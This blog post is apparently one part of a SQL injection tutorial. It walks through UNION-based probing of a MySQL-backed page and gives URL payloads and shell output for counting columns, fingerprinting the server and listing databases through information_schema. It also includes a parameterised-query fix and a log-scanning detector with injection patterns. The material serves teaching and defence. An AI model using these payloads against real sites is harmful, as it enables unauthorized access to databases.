Monday, June 18, 2012

Probing The Database

Okay, so now that we have the number of columns, the database name and the vulnerable (injectable) column, let's take the next step and probe the database for further information.

A quick review:

http://www.example.com/index.php?id=1
http://www.example.com/index.php?id=1'    --+
http://www.example.com/index.php?id=1' ORDER BY 3 --+ << column count is 3, since ORDER BY 4 gives an error
http://www.example.com/index.php?id=1' UNION SELECT 1,2,3   --+ << this shows all 3 columns
http://www.example.com/index.php?id=-1' UNION SELECT database(),current_user(),@@version   --+

Now let's try to see the tables.

As usual, let's first work it out in the MySQL shell. The reason we checked the MySQL version is that MySQL 5 and above ship a database named information_schema, a catalogue that holds metadata about every database, table and column on the server. We will use it to probe the databases for data.

Now on the left side we have the application's own query:

SELECT * FROM Products where id = 1; << the normal workflow

What we have to work on is the right side, everything we can append after the id value.

As a pen tester we have no idea how many databases there are, or their names, tables, columns, etc., so let's see how we can probe for and dump that information.
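The left/right split above, reproduced as an added example that is not code from the original post: a Python handler that pastes the id parameter into the query (the left side fixed, the right side attacker-controlled) next to a hardened version that validates the type and binds the value as a parameter. SQLite stands in for the blog's MySQL backend so it runs offline; the table contents, function names and payload string are constructed assumptions, with the payload copied from the post's own URL.

```python
import sqlite3

# Constructed sample schema mirroring the post's products table (assumption:
# the blog's real app is PHP + MySQL; SQLite stands in here so this runs offline).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
INSERT INTO products VALUES (1, 'Printer', 4500), (2, 'Scanner', 3200);
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def query_vulnerable(con, user_id):
    """The 'left side' of the post: the app's fixed query with the URL parameter
    pasted in as a string. Whatever follows the closing quote becomes the
    attacker's 'right side' and is parsed as SQL."""
    sql = "SELECT * FROM products WHERE id = '" + user_id + "'"
    return con.execute(sql).fetchall()


def query_safe(con, user_id):
    """Hardened version: validate the type first, then bind the value as a
    parameter so the database never sees it as query text."""
    try:
        id_value = int(user_id)
    except ValueError:
        return []  # not an integer: reject it (a real handler would answer 400)
    return con.execute("SELECT * FROM products WHERE id = ?", (id_value,)).fetchall()


def error_message(con, user_id):
    """What the 'ORDER BY 4 gives an error' step relies on: the database error
    text. Returns it if the vulnerable query fails, else None."""
    try:
        query_vulnerable(con, user_id)
        return None
    except sqlite3.Error as exc:
        return str(exc)


# The same payload the post builds in the URL; '--+' URL-decodes to '-- ' (a comment).
PAYLOAD = "-1' UNION SELECT 1,2,3 -- "

if __name__ == "__main__":
    con = make_db()
    print(query_vulnerable(con, "1"))              # [(1, 'Printer', 4500)]
    print(query_vulnerable(con, PAYLOAD))          # [(1, 2, 3)]  <- attacker-chosen row
    print(error_message(con, "1' ORDER BY 4 -- "))  # an error message leaks the column count
    print(query_safe(con, PAYLOAD))                # []
```

The -1 in the payload makes the application's own row disappear, so only the attacker's UNION row is rendered; the hardened handler returns nothing for the same input because it never reaches the SQL parser. The error_message helper shows why an application should log database errors rather than echo them: the column-count probe in step 3 below only works when that message (or a distinguishable 500 page) comes back to the client.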

Let's first build our queries on the MySQL server.

1. To find the current database:

mysql> select database();
+------------+
| database() |
+------------+
| ckorner    |
+------------+
1 row in set (0.00 sec)

2. To see all tables:

mysql> show tables;
+-------------------+
| Tables_in_ckorner |
+-------------------+
| admin             |
| products          |
| users             |
+-------------------+
3 rows in set (0.00 sec)

But we cannot use the SHOW command in our URL query, so this approach does not work there.

3. Find the number of columns in use:

mysql> select * from products where id = 1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> select * from products where id = 1 order by 3;
+------+---------+-------+
| id   | name    | price |
+------+---------+-------+
|    1 | Printer |  4500 |
+------+---------+-------+
1 row in set (0.00 sec)

So 3 columns are in use.

4. To find the injectable columns:

mysql> select * from products where id = 1 union select "foo", "baar", "spam";
+------+---------+-------+
| id   | name    | price |
+------+---------+-------+
| 1    | Printer | 4500  |
| foo  | baar    | spam  |
+------+---------+-------+
2 rows in set (0.00 sec)

mysql> select * from products where id = 1 union select 1,2,3;
+------+---------+-------+
| id   | name    | price |
+------+---------+-------+
|    1 | Printer |  4500 |
|    1 | 2       |     3 |
+------+---------+-------+
2 rows in set (0.00 sec)

Okay, it seems all columns are injectable.

5. Finding the database name and version:

mysql> select * from products where id = 1 union select @@version,database(),3;
+--------+---------+-------+
| id     | name    | price |
+--------+---------+-------+
| 1      | Printer |  4500 |
| 5.5.16 | ckorner |     3 |
+--------+---------+-------+
2 rows in set (0.00 sec)

6. To find the number of databases:

mysql> select * from products where id = 1 union select count(database()),2,3 from information_schema.schemata;
+------+---------+-------+
| id   | name    | price |
+------+---------+-------+
|    1 | Printer |  4500 |
|    8 | 2       |     3 |
+------+---------+-------+
2 rows in set (0.00 sec)

So this server has 8 databases (count(database()) just counts one non-NULL value per row of schemata, so count(*) would give the same result).

7. Let's try to get the names of all databases:

mysql> select * from products where id = 1 union select table_schema,2,3 from information_schema.tables;
+--------------------+---------+-------+
| id                 | name    | price |
+--------------------+---------+-------+
| 1                  | Printer |  4500 |
| information_schema | 2       |     3 |
| cdcol              | 2       |     3 |
| ckorner            | 2       |     3 |
| mysql              | 2       |     3 |
| performance_schema | 2       |     3 |
| phpmyadmin         | 2       |     3 |
| webauth            | 2       |     3 |
+--------------------+---------+-------+
8 rows in set (0.00 sec)

information_schema is present in every MySQL installation of version 5 and above.

Let's look inside the information_schema database:

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_CMP_RESET                      |
| INNODB_TRX                            |
| INNODB_CMPMEM_RESET                   |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
+---------------------------------------+
37 rows in set (0.00 sec)

mysql> desc tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field           | Type                | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG   | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA    | varchar(64)         | NO   |     |         |       |
| TABLE_NAME      | varchar(64)         | NO   |     |         |       |
| TABLE_TYPE      | varchar(64)         | NO   |     |         |       |
| ENGINE          | varchar(64)         | YES  |     | NULL    |       |
| VERSION         | bigint(21) unsigned | YES  |     | NULL    |       |
| ROW_FORMAT      | varchar(10)         | YES  |     | NULL    |       |
| TABLE_ROWS      | bigint(21) unsigned | YES  |     | NULL    |       |
| AVG_ROW_LENGTH  | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_LENGTH     | bigint(21) unsigned | YES  |     | NULL    |       |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| INDEX_LENGTH    | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_FREE       | bigint(21) unsigned | YES  |     | NULL    |       |
| AUTO_INCREMENT  | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_TIME     | datetime            | YES  |     | NULL    |       |
| UPDATE_TIME     | datetime            | YES  |     | NULL    |       |
| CHECK_TIME      | datetime            | YES  |     | NULL    |       |
| TABLE_COLLATION | varchar(32)         | YES  |     | NULL    |       |
| CHECKSUM        | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_OPTIONS  | varchar(255)        | YES  |     | NULL    |       |
| TABLE_COMMENT   | varchar(2048)       | NO   |     |         |       |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.00 sec)

mysql> desc columns;
+--------------------------+---------------------+------+-----+---------+-------+
| Field                    | Type                | Null | Key | Default | Extra |
+--------------------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG            | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA             | varchar(64)         | NO   |     |         |       |
| TABLE_NAME               | varchar(64)         | NO   |     |         |       |
| COLUMN_NAME              | varchar(64)         | NO   |     |         |       |
| ORDINAL_POSITION         | bigint(21) unsigned | NO   |     | 0       |       |
| COLUMN_DEFAULT           | longtext            | YES  |     | NULL    |       |
| IS_NULLABLE              | varchar(3)          | NO   |     |         |       |
| DATA_TYPE                | varchar(64)         | NO   |     |         |       |
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| CHARACTER_OCTET_LENGTH   | bigint(21) unsigned | YES  |     | NULL    |       |
| NUMERIC_PRECISION        | bigint(21) unsigned | YES  |     | NULL    |       |
| NUMERIC_SCALE            | bigint(21) unsigned | YES  |     | NULL    |       |
| CHARACTER_SET_NAME       | varchar(32)         | YES  |     | NULL    |       |
| COLLATION_NAME           | varchar(32)         | YES  |     | NULL    |       |
| COLUMN_TYPE              | longtext            | NO   |     | NULL    |       |
| COLUMN_KEY               | varchar(3)          | NO   |     |         |       |
| EXTRA                    | varchar(27)         | NO   |     |         |       |
| PRIVILEGES               | varchar(80)         | NO   |     |         |       |
| COLUMN_COMMENT           | varchar(1024)       | NO   |     |         |       |
+--------------------------+---------------------+------+-----+---------+-------+
19 rows in set (0.00 sec)

This database doesn't seem interesting for now, but in a later post we will see how important it is.

So let's frame our queries in the URL:

http://www.example.com/index.php?id=1' union select 1,2,3--+

http://www.example.com/index.php?id=-1' union select count(database()),2,3 from information_schema.schemata--+

http://www.example.com/index.php?id=-1' union select table_schema,2,3 from information_schema.tables--+

The use of -1 was explained in the earlier post, so why it appears here should not be a question.

That is all for this post; more in the next one. Hope you are enjoying it.
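On the detection side, as an added example that is not part of the original post: a small scanner that URL-decodes the query string of web-server access-log lines and flags the indicators this walkthrough relies on (an ORDER BY probe, UNION SELECT, the MySQL fingerprint functions, reads from information_schema, and the --+ comment terminator). The log lines are constructed, in a trimmed Apache combined format, replaying the post's URLs against a hypothetical /index.php; the last line is a benign search request included to show a non-match. Indicator names and the scan() function are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (trimmed Apache combined format) that
# replay the URLs from this post; the last line is a benign request.
LOGS = """\
10.0.0.5 - - [18/Jun/2012:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [18/Jun/2012:10:01:09 +0000] "GET /index.php?id=1%27+ORDER+BY+4+--+ HTTP/1.1" 500 231
10.0.0.5 - - [18/Jun/2012:10:01:15 +0000] "GET /index.php?id=-1%27+UNION+SELECT+database(),current_user(),@@version+--+ HTTP/1.1" 200 540
10.0.0.5 - - [18/Jun/2012:10:01:21 +0000] "GET /index.php?id=-1%27+union+select+table_schema,2,3+from+information_schema.tables--+ HTTP/1.1" 200 1290
10.0.0.9 - - [18/Jun/2012:10:02:00 +0000] "GET /search.php?q=union+station+select+board HTTP/1.1" 200 800
"""

# client ip, request target (path + query string), HTTP status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Each indicator mirrors one step of the walkthrough. Matching runs on the
# decoded, lower-cased, whitespace-folded query string, where '--+' has become '-- '.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "mysql_fingerprint": re.compile(r"@@version|\bdatabase\(\)|\bcurrent_user\(\)"),
    "comment_terminator": re.compile(r"--(?:\s|$)|/\*"),
}


def normalise(target):
    """URL-decode the query string ('+' counts as a space, as in the post's --+)
    and fold case and whitespace so the patterns are not trivially case-sensitive."""
    query = target.split("?", 1)[1] if "?" in target else ""
    decoded = unquote_plus(query).lower()
    return re.sub(r"\s+", " ", decoded)


def scan(log_text):
    """Return one finding per log line whose decoded query matches any indicator."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = normalise(target)
        matched = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if matched:
            findings.append({"line": number, "client": client, "status": int(status),
                             "query": query, "indicators": matched})
    return findings


if __name__ == "__main__":
    for f in scan(LOGS):
        print(f"line {f['line']} {f['client']} HTTP {f['status']}: "
              f"{f['indicators']}  <- {f['query']}")
```

Two things worth noting when running this over real logs: the 500 on the ORDER BY line is itself a signal (the probe only works when the error reaches the client, so pairing a probe indicator with a 5xx status is a strong alert), and pattern matching of this kind is a detection aid, not a fix. Encoding variations and inline comments can slip past a short pattern list, which is why the application-side answer remains parameterised queries and not request filtering.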

Thank You!
